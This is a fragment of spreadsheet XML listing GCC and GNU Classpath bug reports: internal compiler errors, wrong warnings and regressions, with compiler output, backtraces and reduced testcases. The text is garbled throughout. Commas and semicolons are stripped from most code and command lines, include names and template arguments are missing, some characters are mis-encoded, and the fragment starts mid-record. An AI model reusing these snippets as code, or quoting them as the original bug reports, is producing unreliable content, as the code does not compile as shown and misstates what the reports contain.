LAST_UPDATED: Thu Aug 25 10:17:37 UTC 2005
Note that on x86 it still ICE because of SRA see PR18659.
.. C32001E ACATS 2.5 05-08-25 13:55:30
---- C32001E CHECK THAT IN MULTIPLE OBJECT DECLARATIONS FOR PRIVATE
                TYPES THE SUBTYPE INDICATION AND THE INITIALIZATION
                EXPRESSIONS ARE EVALUATED ONCE FOR EACH NAMED OBJECT
                THAT IS DECLARED AND THE SUBTYPE INDICATION IS EVALUATED
                FIRST.  ALSO CHECK THAT THE EVALUATIONS YIELD THE SAME 
                RESULT AS A SEQUENCE OF SINGLE OBJECT DECLARATIONS.
   * C32001E V1 HAS AN INCORRECT UPPER BOUND OF  338.
   * C32001E V1 HAS AN INCORRECT COMPONENT VALUE.
   * C32001E V2 HAS AN INCORRECT UPPER BOUND OF  338.
   * C32001E V2 HAS AN INCORRECT COMPONENT VALUE.
   * C32001E CV1 HAS AN INCORRECT UPPER BOUND OF  338.
   * C32001E CV1 HAS AN INCORRECT COMPONENT VALUE.
   * C32001E CV2 HAS AN INCORRECT UPPER BOUND OF  338.
   * C32001E CV2 HAS AN INCORRECT COMPONENT VALUE.
**** C32001E FAILED ****************************.</t>
  </si>
  <si>
    <t>GCC-37495</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/compile/vector-4.c</t>
  </si>
  <si>
    <t>On i686-apple-darwin9 gcc.c-torture/compile/vector-4.c fails with:
/var/folders/iU/iUj3xngxGYe3MPCc0TZUcE+++TI/-Tmp-//ccC7klQ7.s:19:no such instruction: `vmovq (%eax) %xmm0'
/var/folders/iU/iUj3xngxGYe3MPCc0TZUcE+++TI/-Tmp-//ccC7klQ7.s:20:no such instruction: `vmovq %xmm0 -48(%ebp)'
/var/folders/iU/iUj3xngxGYe3MPCc0TZUcE+++TI/-Tmp-//ccC7klQ7.s:58:no such instruction: `vmovd -36(%ebp) %xmm0'
/var/folders/iU/iUj3xngxGYe3MPCc0TZUcE+++TI/-Tmp-//ccC7klQ7.s:59:no such instruction: `vpinsrd $0x1 %eax%xmm0%xmm0'
/var/folders/iU/iUj3xngxGYe3MPCc0TZUcE+++TI/-Tmp-//ccC7klQ7.s:60:no such instruction: `vmovq %xmm0 -32(%ebp)'
The test comiles with -m64.</t>
  </si>
  <si>
    <t>GCC-34449</t>
  </si>
  <si>
    <t>use_facet(locale::classic()) returns true</t>
  </si>
  <si>
    <t>The test case below is expected to pass. With gcc 4.1.2 it aborts in the second assert.
$ cat t.cpp &amp;&amp; g++ t.cpp &amp;&amp; ./a.out
#include 
#include 
struct DerivedCtype: std::ctype_byname {
    DerivedCtype (): std::ctype_byname() { }
}
template 
bool check_use_facet (const std::locale &amp;locale)
{
    try {
        std::use_facet(locale)
    }
    catch (...) {
        return false
    }
    return true
}
int main ()
{
    const std::locale classic = std::locale::classic ()
    const std::locale named (en_US.ISO-8859-1)
    const std::locale user (classic new DerivedCtype)
    assert (check_use_facet &gt;(classic))
    assert (!check_use_facet &gt;(classic))
    assert (!check_use_facet(classic))
    assert (check_use_facet &gt;(named))
    assert (check_use_facet &gt;(named))
    assert (!check_use_facet(named))
    assert (check_use_facet &gt;(user))
    assert (check_use_facet &gt;(user))
    assert (check_use_facet(user))
}
a.out: t.cpp:28: int main(): Assertion `!check_use_facet
 &gt;(classic)' failed.</t>
  </si>
  <si>
    <t>GCC-44941</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: RTL check: expected code 'mem' have 'reg' in emit_block_move_hints at expr.c:1189</t>
  </si>
  <si>
    <t>Command line:
$ gcc -O[123s] testcase.c
Compiler output:
$ gcc -O testcase.c
testcase.c: In function 'foo':
testcase.c:7:7: internal compiler error: RTL check: expected code 'mem' have 'reg' in emit_block_move_hints at expr.c:1189
Unreduced testcase crashes with:
$ gcc -O rarpd.i
rarpd.c: In function 'load_if':
rarpd.c:203:41: internal compiler error: in make_decl_rtl at varasm.c:1346
Reduced testcase without rtl checking crashes with:
$ gcc -O testcase.c
testcase.c: In function 'foo':
testcase.c:7:7: internal compiler error: Segmentation fault
Tested revisions:
r162193 - crash
r162056 - crash
r161659 - crash
r161170 - OK</t>
  </si>
  <si>
    <t>GCC-26823</t>
  </si>
  <si>
    <t>ICE with OpenMP in add_stmt_to_eh_region_fn at tree-eh.c:100</t>
  </si>
  <si>
    <t>The following code snippet causes an ICE when compiled with -fopenmp:
==============================
struct A
{
  ~A() {}
}
struct B
{
  A a
  B()
}
void foo()
{
#pragma omp parallel
  {
    B b[1]
    new int
  }
}
==============================
bug.cc: In function 'void foo()':
bug.cc:12: internal compiler error: in add_stmt_to_eh_region_fn at tree-eh.c:100
Please submit a full bug report [etc.]
This is probably the bug mentioned in comment #16 from PR26084.</t>
  </si>
  <si>
    <t>GCC-43896</t>
  </si>
  <si>
    <t>[OOP] ICE in gfc_conv_variable at fortran/trans-expr.c:551</t>
  </si>
  <si>
    <t>/opt/gfortran/bin/gfortran -c m_rotation_matrix.f03 m_vector.f03 
m_vector.f03: In function â€˜rotation_matrix_times_vectorâ€™:
m_vector.f03:382:0: internal compiler error: in gfc_conv_variable at fortran/trans-expr.c:551
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-47882</t>
  </si>
  <si>
    <t>Incorrect array subscript is above array bounds warning</t>
  </si>
  <si>
    <t>Created attachment 23454
testcase
$ gcc-4.4 -Wall -Werror -O2 -c -o bounds2.o bounds2.c
cc1: warnings being treated as errors
bounds2.c: In function â€˜entryâ€™:
bounds2.c:18: error: array subscript is above array bounds
$ gcc-4.4 -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.4.5-8' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.4 --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.4.5 (Debian 4.4.5-8) 
Also happens with debian's gcc-4.3:
$ gcc-4.3 -Wall -Werror -O2 -c -o bounds2.o bounds2.c
cc1: warnings being treated as errors
bounds2.c: In function â€˜entryâ€™:
bounds2.c:18: error: array subscript is above array bounds
$ gcc-4.3 -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.3.5-4' --with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.3.5 (Debian 4.3.5-4)</t>
  </si>
  <si>
    <t>GCC-8471</t>
  </si>
  <si>
    <t>metacity-2.4.3 causes ICE on powerpc with gcc-3.2</t>
  </si>
  <si>
    <t>when compiling metacity-2.4.3 the following occurs:
powerpc-unknown-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I. -I.. -DORBIT2=1 -D_REENTRANT -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/pango-1.0 -I/usr/X11R6/include -I/usr/include/freetype2 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/gconf/2 -I/usr/include/orbit-2.0 -I/usr/include/linc-1.0 -I/usr/include/startup-notification-1.0   -DMETACITY_LIBEXECDIR=\/usr/libexec\ -DHOST_ALIAS=\powerpc-unknown-linux-gnu\ -DMETACITY_LOCALEDIR=\/usr/share/locale\ -DMETACITY_PKGDATADIR=\/usr/share/metacity\ -DMETACITY_DATADIR=\/usr/share\ -DG_LOG_DOMAIN=\metacity\ -DSN_API_NOT_YET_FROZEN=1    -O2 -pipe -mcpu=7400 -maltivec -mabi=altivec -mpowerpc-gfxopt -fsigned-char -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wsign-compare -c screen.c
screen.c: In function `meta_screen_calc_workspace_layout':
screen.c:1568: unrecognizable insn:
(insn 146 57 147 (parallel[ 
            (set (reg/v:SI 11 r11 [120])
                (plus:SI (gt:SI (reg:SI 0 r0 [141])
                        (const_int 0 [0x0]))
                    (reg:SI 9 r9 [134])))
            (clobber (reg:SI 8 r8))
        ] ) -1 (nil)
    (nil))
screen.c:1568: Internal compiler error in extract_insn at recog.c:2148
Release:
gcc-3.2
Environment:
Gentoo Linux 1.4_rc1 on PPC with kernel 2.4.19 glibc-2.2.5-r7
How-To-Repeat:
100% reproducible. just compile that file.</t>
  </si>
  <si>
    <t>nall</t>
  </si>
  <si>
    <t>GCC-41847</t>
  </si>
  <si>
    <t>warning: array subscript is above array bounds</t>
  </si>
  <si>
    <t>#  gcc -Wall -O2 -c demo.cxx
demo.cxx: In function â€˜void isInvertible()â€™:
demo.cxx:12: warning: array subscript is above array bounds
gcc --version
gcc (GCC) 4.4.2 20091019 (Red Hat 4.4.2-5)
I've the same results with...
gcc (GCC) 4.4.2 20091019 (Red Hat 4.4.2-5) (gcc-4.4.2-5.el6.s390x)
gcc (GCC) 4.4.1 20090725 (Red Hat 4.4.1-3) (gcc-4.4.1-3.s390x)
gcc (GCC) 4.4.0 20090506 (Red Hat 4.4.0-4) (gcc-4.4.0-4.s390x)
Possibly a duplicate of #35392
so its not a very recent thing.
I only get this warning (and related runtime failure) with s390x. Equivalent x86_64/x86/ppc/ppc64/arm gcc's appear fine</t>
  </si>
  <si>
    <t>GCC-57391</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE compiling AIX math.h caused by PR c++/56930</t>
  </si>
  <si>
    <t>The patch for PR c++/56930 breaks bootstrap on AIX when building libstdc++.  I now receive the following error message:
/tmp/20130524/gcc/include-fixed/math.h: In function 'long double
fmal(long double long double long double)':
/tmp/20130524/gcc/include-fixed/math.h:879:135: internal compiler
error: unexpected expression '#'fma_expr' not supported by
dump_expr#' of kind fma_expr
 inline long double fmal(long double __x long double __y long double
__z) { return fma((double) (__x) (double) (__y) (double) (__z)) }
When not using long double 128 AIX math.h provides a number of
definitions including
inline long double fmal(long double __x long double __y long double __z)
{ return fma((double) (__x) (double) (__y) (double) (__z)) }
Reverting
--- a/gcc/cp/call.c
+++ b/gcc/cp/call.c
@@ -619910 +619910 @@ convert_like_real (conversion *convs tree expr tree fn int argnum
   if (convs-&gt;check_narrowing)
     check_narrowing (totype expr)
-  if (issue_conversion_warnings &amp;&amp; (complain &amp; tf_warning))
-    expr = convert_and_check (totype expr)
+  if (issue_conversion_warnings)
+    expr = cp_convert_and_check (totype expr complain)
   else
-    expr = convert (totype expr)
+    expr = cp_convert (totype expr complain)
   return expr
 }
removes the ICE.</t>
  </si>
  <si>
    <t>GCC-25254</t>
  </si>
  <si>
    <t>ICE with -mcmodel=medium -mlarge-data-threshold=1</t>
  </si>
  <si>
    <t>/* { dg-options -mcmodel=medium -mlarge-data-threshold=1 { target x86_64-*-* } } */
typedef int FILE
extern FILE *stdout
extern int fprintf (FILE * const char * ...)
void bar (void)
{
  fprintf (stdout OK)
}
ICEs in named_section.</t>
  </si>
  <si>
    <t>GCC-21716</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] ICE in reg-stack.c's swap_rtx_condition</t>
  </si>
  <si>
    <t>Attached testcase ICEs at -m32 -march=i386 -O2 -ffast-math in swap_rtx_condition.
Cross jumping there merges testqi_ext_0/jcc_1 from 2 different BB's but keeps
the %ax setters (cmpfp_2_df_1) in the original blocks.
(insn:HI 2037 4155 2038 55 (set (reg:HI 0 ax [783])
        (unspec:HI [
                (compare:CCFP (reg/v:DF 10 st(2) [orig:354 cf0d2 ] [354])
                    (reg:DF 12 st(4)))
            ] 24)) 22 {*cmpfp_2_df_1} (insn_list 4399 (insn_list 4400 (nil)))
    (expr_list:REG_DEAD (reg:DF 12 st(4))
        (nil)))
(note:HI 2038 2037 4525 55 NOTE_INSN_DELETED)
 End of basic block 55 registers live:
 0 [ax] 3 [bx] 4 [si] 5 [di] 6 [bp] 7 [sp] 10 [st(2)] 11 [st(3)] 13 [st(5)] 14
[st(6)] 15 [st(7)] 16 [argp] 20 [frame]
 Start of basic block 56 registers live: 0 [ax] 3 [bx] 4 [si] 5 [di] 6 [bp] 7
[sp] 10 [st(2)] 11 [st(3)] 13 [st(5)] 14 [st(6)] 15 [st(7)] 16 [argp] 20 [frame]
(code_label 4525 2038 4523 56 173  [1 uses])
(note 4523 4525 2448 56 [bb 56] NOTE_INSN_BASIC_BLOCK)
(note:HI 2448 4523 2449 56 NOTE_INSN_DELETED)
(note:HI 2449 2448 2450 56 NOTE_INSN_DELETED)
(note:HI 2450 2449 4359 56 NOTE_INSN_DELETED)
(insn 4359 2450 2453 56 (set (reg:CCZ 17 flags)
        (compare:CCZ (and:SI (zero_extract:SI (reg:SI 0 ax [834])
                    (const_int 8 [0x8])
                    (const_int 8 [0x8]))
                (const_int 1 [0x1]))
            (const_int 0 [0x0]))) 278 {*testqi_ext_0} (nil)
    (expr_list:REG_DEAD (reg:SI 0 ax [834])
        (nil)))
(jump_insn:HI 2453 4359 4454 56 (set (pc)
        (if_then_else (eq (reg:CCZ 17 flags)
                (const_int 0 [0x0]))
            (label_ref 1835)
            (pc))) 494 {*jcc_1} (insn_list 4359 (nil))
    (expr_list:REG_DEAD (reg:CCZ 17 flags)
        (expr_list:REG_BR_PROB (const_int 8448 [0x2100])
            (nil))))
When swap_rtx_condition is called on insn 2037 it doesn't find the %ax user
in the same BB but as the last instruction in the BB is not INSN_P() it crashes
when trying to dereference it's PATTERN.</t>
  </si>
  <si>
    <t>CLASSPATH-28719</t>
  </si>
  <si>
    <t>Regression:JTree and JTable only scroll down with the mouse wheel</t>
  </si>
  <si>
    <t>This is a very recent regression introduced by patches in 2006-08-13. I only enter this bug with purpose not to forget to fix till the next release.</t>
  </si>
  <si>
    <t>GCC-64200</t>
  </si>
  <si>
    <t>ICE: in decide_alg at config/i386/i386.c:24510 with -mmemcpy-strategy=libcall:-1:align -minline-stringops-dynamically</t>
  </si>
  <si>
    <t>Created attachment 34202
reduced testcase
Compiler output:
$ gcc -mmemcpy-strategy=libcall:-1:align -minline-stringops-dynamically testcase.c testcase.c: In function 'foo':
testcase.c:14:5: internal compiler error: in decide_alg at config/i386/i386.c:24510
   d = __builtin_va_arg(ap typeof (d))
     ^
0xf110d2 decide_alg
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:24510
0xf59cff ix86_expand_set_or_movmem(rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* bool)
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:24763
0x106cefe gen_movmemdi(rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def*)
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.md:15893
0xb19eb2 insn_gen_fn::operator()(rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def*) const
        /mnt/svn/gcc-trunk/gcc/recog.h:310
0xb19eb2 maybe_gen_insn(insn_code unsigned int expand_operand*)
        /mnt/svn/gcc-trunk/gcc/optabs.c:8395
0xb1a4c8 maybe_expand_insn(insn_code unsigned int expand_operand*)
        /mnt/svn/gcc-trunk/gcc/optabs.c:8407
0x8d8b9e emit_block_move_via_movmem
        /mnt/svn/gcc-trunk/gcc/expr.c:1330
0x8d8b9e emit_block_move_hints(rtx_def* rtx_def* rtx_def* block_op_methods unsigned int long unsigned long unsigned long unsigned long)
        /mnt/svn/gcc-trunk/gcc/expr.c:1148
0x7974d1 expand_builtin_memcpy_args
        /mnt/svn/gcc-trunk/gcc/builtins.c:3241
0x7a6f1c expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
        /mnt/svn/gcc-trunk/gcc/builtins.c:6286
0x8d4716 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /mnt/svn/gcc-trunk/gcc/expr.c:10471
0x7caf89 expand_expr
        /mnt/svn/gcc-trunk/gcc/expr.h:299
0x7caf89 expand_call_stmt
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2347
0x7cb6bf expand_gimple_stmt_1
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:3293
0x7cb6bf expand_gimple_stmt
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:3447
0x7d0c53 expand_gimple_basic_block
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:5280
0x7d3146 execute
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:5889
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r218413 - ICE (after PR64108 fix)
4_9 r218177 - ICE</t>
  </si>
  <si>
    <t>GCC-42716</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in extract_range_from_assert at tree-vrp.c:1423</t>
  </si>
  <si>
    <t>regehr@john-home:~/volatile/bugs/tmp252$ current-gcc -O2 -c small.c
small.c: In function â€˜barâ€™:
small.c:12:6: internal compiler error: in extract_range_from_assert at tree-vrp.c:1423
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
regehr@john-home:~/volatile/bugs/tmp252$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/tmp/gcc-r155838-install/libexec/gcc/i686-pc-linux-gnu/4.5.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/tmp/gcc-r155838-install --program-prefix=r155838- --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20100112 (experimental) (GCC) 
regehr@john-home:~/volatile/bugs/tmp252$ cat small.c
static short foo (long long si1 short si2)
{
  return si1 &gt; 0 &amp;&amp; si2 &gt; 0 &amp;&amp; si1 &gt; 9223372036854775807LL - si2 || si1 &lt; 0
}
int g_13
unsigned g_17
int safe (int int)
void bar (short p_51 short * p_52)
{
  int *const l_55 = 
  if (safe (*p_52 g_13 != foo (*p_52 &amp; *l_55 == g_13 &amp;&amp; g_17 &gt;= 1 0)))
    {
    }
}</t>
  </si>
  <si>
    <t>GCC-12369</t>
  </si>
  <si>
    <t>[3.3 Regression] ICE with templates and friends</t>
  </si>
  <si>
    <t>The following code causes ICE and Segmentation fault on line (1):
struct A {
    template T* make() { return new T() }
}
struct B {
    friend B* A::make() // (1)
}
Compilation command line: g++ -o ice.o ice.cc
Output of g++ -v:
Reading specs from /usr/lib/gcc-lib/i386-linux/3.3.1/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.3.1 (Debian)</t>
  </si>
  <si>
    <t>GCC-1131</t>
  </si>
  <si>
    <t>make fails on solaris 2.5.1 and 2.6</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: ralph@laratech.ca
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/123: make fails on solaris 2.5.1 and 2.6
Date: Wed 5 Jan 2000 08:48:37 -0800 (PST)
 I checked in a fix for this yesterday.
 Can you try it?
 Tom
</t>
  </si>
  <si>
    <t>ralph</t>
  </si>
  <si>
    <t>GCC-2412</t>
  </si>
  <si>
    <t>jv-scan reports parse error</t>
  </si>
  <si>
    <t>jv-scan reports parse error on the following code.
public class bug1
{
    Class c = Object[].class
}
It is
Release:
unknown
Environment:
&gt; gcj --version
3.0</t>
  </si>
  <si>
    <t>mika.riekkinen</t>
  </si>
  <si>
    <t>GCC-50812</t>
  </si>
  <si>
    <t>libbid build fails with ICE on bid128_div.c</t>
  </si>
  <si>
    <t>Created attachment 25561
Preprocessed source triggering the ICE
Building a cross-compiler to i586-pc-mingw32 fails with an ICE while compiling libgcc or more precisely libbid's bid128_div.c:
../../../../gcc/trunk/libgcc/config/libbid/bid128_div.c:1851:1: internal compiler error: in inline_small_functions at ipa-inline.c:1407
The cross-compiler is configured with: ../../gcc/trunk/configure --prefix=/Users/fx/devel/mingw/cross --target=i586-pc-mingw32 --disable-werror --with-gmp=/Users/fx/devel/gcc/deps-static/x86_64 --enable-languages=cfortran
The backtrace of the ICE is:
#0  fancy_abort (file=0x100aae258 ../../../gcc/trunk/gcc/ipa-inline.c line=1407 function=0x100aae9a0 inline_small_functions) at diagnostic.c:897
#1  0x000000010056dd1a in ipa_inline () at ipa-inline.c:1407
#2  0x0000000100617f17 in execute_one_pass (pass=0x100aae258) at passes.c:2064
#3  0x0000000100618a7c in execute_ipa_pass_list (pass=0x100aae258) at passes.c:2431
#4  0x000000010035f89c in ipa_passes [inlined] () at /Users/fx/devel/gcc/trunk/gcc/cgraphunit.c:2061
#5  0x000000010035f89c in cgraph_optimize () at cgraphunit.c:2116
#6  0x000000010036099f in cgraph_finalize_compilation_unit () at cgraphunit.c:1312
#7  0x00000001000157d8 in c_write_global_declarations () at c-decl.c:9940
#8  0x00000001006db701 in do_compile [inlined] () at /Users/fx/devel/gcc/trunk/gcc/toplev.c:581
I attach the preprocessed source. The bug is triggered consistently at -O1 and higher optimization. It can be reproduced simply with cc1 -O bid128_div.i</t>
  </si>
  <si>
    <t>CLASSPATH-26394</t>
  </si>
  <si>
    <t>DefaultHighlighter.DefaultPainter cannot handle text lines with different font sizes</t>
  </si>
  <si>
    <t>Summary says it all.</t>
  </si>
  <si>
    <t>CLASSPATH-22973</t>
  </si>
  <si>
    <t>swing: ClassCastException: javax/swing/JTextArea</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce:
1. Compile and run the attached testcase.
2. Hit enter on the textarea.
Expected results:
1. A window shows up.
2. An empty line is added to the textarea
Actual results:
1. A window shows up
2. An empty line is added to the textarea but the program also throws the following exception:
Exception during event dispatch:
java.lang.ClassCastException: javax/swing/JTextArea
   at javax.swing.JTextField$1.actionPerformed (JTextField.java:101)
   at javax.swing.SwingUtilities.notifyAction (SwingUtilities.java:1092)
   at javax.swing.JComponent.processKeyBinding (JComponent.java:1824)
   at javax.swing.JComponent.processKeyEvent (JComponent.java:1797)
   at java.awt.Component.processEvent (Component.java:2922)
   at java.awt.Container.processEvent (Container.java:841)
   at java.awt.Component.dispatchEventImpl (Component.java:4779)
   at java.awt.Container.dispatchEventImpl (Container.java:1539)
   at java.awt.Component.dispatchEvent (Component.java:2284)
   at java.awt.KeyboardFocusManager.redispatchEvent (KeyboardFocusManager.java:1108)
   at java.awt.DefaultKeyboardFocusManager.dispatchKeyEvent (DefaultKeyboardFocusManager.java:274)
   at java.awt.DefaultKeyboardFocusManager.dispatchEvent (DefaultKeyboardFocusManager.java:247)
   at java.awt.EventDispatchThread.run (EventDispatchThread.java:74)
Testcase:
import javax.swing.*
import java.awt.event.*
public class textarea extends JFrame implements ActionListener {
        public static void main(String[] args) {
                (new textarea()).show()
        }
        public textarea() {
                JTextField field = new JTextField()
                field.addActionListener(this)
                JTextArea area = new JTextArea(10 40)
                this.setContentPane(area)
                this.pack()
        }
        public void actionPerformed(ActionEvent e) {
        }
}
</t>
  </si>
  <si>
    <t>GCC-5074</t>
  </si>
  <si>
    <t>Static class member initialization</t>
  </si>
  <si>
    <t>Initializing static class members with an expression of t++ all yield the final value for t (ie. for n classes all values of t are n).
Release:
gcc-2.95.3
Environment:
Linux 2.4.4</t>
  </si>
  <si>
    <t>jwezel</t>
  </si>
  <si>
    <t>GCC-40972</t>
  </si>
  <si>
    <t>libtool fails to detect pe-x86-64 import library</t>
  </si>
  <si>
    <t>This prevents the build of libgomp.dll for example:
*** Warning: linker path does not have real file for library -lpthread.
*** I have the capability to make that library automatically link in when
*** you link to this library.  But I can only do this if you have a
*** shared version of the library which you do not appear to have
*** because I did check the linker path looking for a file starting
*** with libpthread and none of the candidates passed a file format test
*** using a file magic. Last file checked: C:/MinGW/cross-gcc/gcc-4.5.0/x86_64-w64-mingw32/mingw/x86_64-w64-mingw32/lib//libpthread.a
*** The inter-library dependencies that have been dropped here will be
*** automatically added whenever a program is linked with this library
*** or is declared to -dlopen it.
*** Since this library must not contain undefined symbols
*** because either the platform does not support them or
*** it was explicitly requested with -no-undefined
*** libtool will only create a static version of it.  
Rainer</t>
  </si>
  <si>
    <t>GCC-97</t>
  </si>
  <si>
    <t>union bug</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Fri 10 Mar 2000 18:39:15 -0800
 Original-Message-Id: 
 gcc told me to report this....
 Here is the file tt.cpp:
 -----------------------
 typedef union {
   int slot1
   int slot2
 }
 -----------------------
 (This error is distilled from a bigger example.)
 Obviously the problem is that I forgot to put the name of the typedef 
 but as I said gcc asked me to report it to you.
 Here's what I get from the command:
 %  gcc -Wall -v --save-temps tt.cpp
 Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
 gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
  /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/cpp -lang-c++ -v -undef -D__GNUC__=2 -D__GNUG__=2 -D__cplusplus -D__GNUC_MINOR__=91 -D__ELF__ -Dunix -Di386 -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__i386__ -D__linux__ -D__unix -D__i386 -D__linux -Asystem(posix) -D__EXCEPTIONS -Wall -Asystem(unix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ tt.cpp tt.ii
 GNU CPP version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386 Linux/ELF)
 #include ... search starts here:
 #include  search starts here:
  /usr/include/g++-2
  /usr/local/include
  /usr/i386-redhat-linux/include
  /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/include
  /usr/include
 End of search list.
  /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/cc1plus tt.ii -quiet -dumpbase tt.cc -Wall -version -o tt.s
 GNU C++ version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386-redhat-linux) compiled by GNU C version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release).
 tt.cpp:5: Internal compiler error.
 tt.cpp:5: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
 tt.cpp:5: See  for details.
 ================================================================
 here is tt.ii (for what it's worth)
 # 1 tt.cpp
 typedef union {
   int slot1
   int slot2
 }
 ================================================================
 John Batali                                    batali@cogsci.ucsd.edu
 Department of Cognitive Science University of California at San Diego
 9500 Gilman Drive La Jolla CA 92093-0515      (619) 534-7308
 http://cogsci.ucsd.edu/~batali/                 (619) 299-4403
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-83679</t>
  </si>
  <si>
    <t>[6 regression] r256113 causes regression on pr77942.f90</t>
  </si>
  <si>
    <t>Since r256113 (backport of fix for PR83650) I have noticed a regression:
FAIL: gfortran.dg/pr77942.f90   -O  (internal compiler error)
It happens on aarch64 and arm targets.
gfortran.log contains:
f951: internal compiler error: Floating point exception
0xb56845 crash_signal
        /gcc/toplev.c:333
0x5f2807 gfc_simplify_cshift(gfc_expr* gfc_expr* gfc_expr*)
        /gcc/fortran/simplify.c:1842
0x57cff1 do_simplify
        /gcc/fortran/intrinsic.c:4158
0x57e2ad gfc_intrinsic_func_interface(gfc_expr* int)
        /gcc/fortran/intrinsic.c:4528
0x5d3d66 resolve_unknown_f
        /gcc/fortran/resolve.c:2718
0x5d3d66 resolve_function
        /gcc/fortran/resolve.c:3013
0x5d3d66 gfc_resolve_expr(gfc_expr*)
        /gcc/fortran/resolve.c:6384
0x5d9ed1 gfc_resolve_code(gfc_code* gfc_namespace*)
        /gcc/fortran/resolve.c:10514
0x5d84cc gfc_resolve_blocks(gfc_code* gfc_namespace*)
        /gcc/fortran/resolve.c:9564
0x5d91aa gfc_resolve_code(gfc_code* gfc_namespace*)
        /gcc/fortran/resolve.c:10504
0x5dac62 resolve_codes
        /gcc/fortran/resolve.c:15775
0x5dad65 gfc_resolve(gfc_namespace*)
        /gcc/fortran/resolve.c:15810
0x5c56db resolve_all_program_units
        /gcc/fortran/parse.c:5868
0x5c56db gfc_parse_file()
        /gcc/fortran/parse.c:6120
0x609972 gfc_be_parse_file
        /gcc/fortran/f95-lang.c:201</t>
  </si>
  <si>
    <t>GCC-46404</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: definition in block 5 does not dominate use in block 32 with -O -fgraphite-identity -fno-tree-scev-cprop</t>
  </si>
  <si>
    <t>Created attachment 22360
reduced testcase
Compiler output:
$ gcc -O -fgraphite-identity -fno-tree-scev-cprop testcase.c
testcase.c: In function 'foo':
testcase.c:4:1: error: definition in block 5 does not dominate use in block 32
for SSA_NAME: i_6 in statement:
D.2701_26 = i_6 &gt; 0
testcase.c:4:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
